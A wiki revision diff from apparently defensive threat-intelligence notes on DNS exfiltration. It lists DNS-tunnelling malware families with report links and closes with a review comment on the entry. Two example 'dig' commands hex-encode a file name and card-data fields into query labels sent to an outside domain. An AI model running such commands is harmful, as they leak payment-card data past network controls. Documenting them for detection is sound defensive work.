infoblox_threat_defense:exfiltration

Differences

This shows you the differences between two versions of the page.

infoblox_threat_defense:exfiltration [2024/12/27 15:09] – created bstafford
infoblox_threat_defense:exfiltration [2024/12/27 15:22] (current) bstafford
Line 1: Line 1:
 +====== Malware Examples using DNS ======
 +  * [[https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/|Snugy Malware]] - 2020 November - Low and Slow DNS Exfiltration and C2.
 +  * [[https://www.bitdefender.com/blog/businessinsights/unpacking-bellaciao-a-closer-look-at-irans-latest-malware/|BellaCiao]] - 2023 April - Low and Slow DNS Exfiltration and C2.
 +  * [[https://cyberscoop.com/fbi-disrupts-russian-cyber-espionage-tool|Medusa]] - 2023 May - Russian Malware [[https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF|Intel Report]]
 +
 +===== Example =====
 +
 <code>dig +short 10.181.64.161 1075.63632e747874.1.bz2oc0.txt.start.hexn.ebb569d085.thehansfamily.com <code>dig +short 10.181.64.161 1075.63632e747874.1.bz2oc0.txt.start.hexn.ebb569d085.thehansfamily.com
 dig +short 10.181.64.161 1.49737375696e674e6574776f726b2c436172644e756d6265720d0a.bz2oc0.hexn.ebb569d085.thehansfamily.com dig +short 10.181.64.161 1.49737375696e674e6574776f726b2c436172644e756d6265720d0a.bz2oc0.hexn.ebb569d085.thehansfamily.com
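
Review bot: The new "Medusa" bullet is inconsistent with its own reference and with the two bullets above it: the linked advisory's filename is JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE, so the entry should name Snake as the malware, and it should say how DNS is used, as the Snugy and BellaCiao bullets do ("Low and Slow DNS Exfiltration and C2") rather than only "Russian Malware". Under the new "Example" heading, add a sentence explaining what the query labels carry, since a reader cannot tell from the block alone: 63632e747874 is hex for "cc.txt" and the long label in the second query is hex for "IssuingNetwork,CardNumber" followed by CRLF, which is the point of the example for anyone writing a detection. Also note that in both dig lines 10.181.64.161 is given without a leading @, so dig treats it as another name to look up rather than as the server to query; if it is meant to be the resolver, write it as @10.181.64.161.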
infoblox_threat_defense/exfiltration.1735312178.txt.gz · Last modified: by bstafford